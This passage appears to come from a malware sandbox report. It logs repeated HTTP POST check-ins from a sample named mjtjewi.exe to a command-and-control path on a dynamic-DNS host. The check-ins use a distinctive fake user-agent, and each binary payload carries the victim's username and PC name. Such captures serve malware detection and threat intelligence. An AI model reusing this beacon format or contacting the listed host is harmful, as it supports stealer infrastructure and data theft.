Oct 3, 2024 09:21:33.556186914 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:35.070835114 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:35.071057081 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:35.071317911 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.11	64388	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:35.234649897 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:35.239656925 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:46.491751909 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.11	64389	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:46.642540932 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:46.647500992 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:47.323739052 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.11	64390	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:47.482239008 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:47.487101078 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:48.280944109 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.11	64391	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:48.435915947 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:48.440835953 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:49.089157104 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.11	64392	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:49.253714085 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:49.258711100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:50.342468977 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:50.342633009 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.11	64393	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:50.494801044 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:50.499694109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:51.137919903 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.11	64394	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:51.282442093 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:51.287565947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:51.987176895 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.11	64395	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:52.143836975 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:52.148747921 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:52.824364901 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.11	64396	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:52.975395918 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:52.981934071 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:53.812876940 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.11	64397	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:53.998188972 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:54.007169008 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:54.779628992 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.11	64398	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:54.934883118 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:54.945255995 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:55.743837118 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.11	64399	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:55.903311968 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:55.920208931 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:57.049427986 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.11	64400	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:57.211874008 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:57.220849991 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:58.009134054 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.11	64401	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:58.166697025 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:58.171911955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:58.968790054 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.11	64402	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:59.146181107 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:59.151254892 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:59.912592888 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.11	64403	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:00.068260908 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:00.075267076 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:00.875777006 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.11	64404	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:01.038656950 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:01.051486015 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:02.986509085 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.11	64405	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:03.152149916 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:03.157629013 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:03.927012920 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.11	64406	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:04.103874922 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:04.115545034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:04.921690941 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.11	64407	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:05.334078074 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:05.338912010 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:06.114370108 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
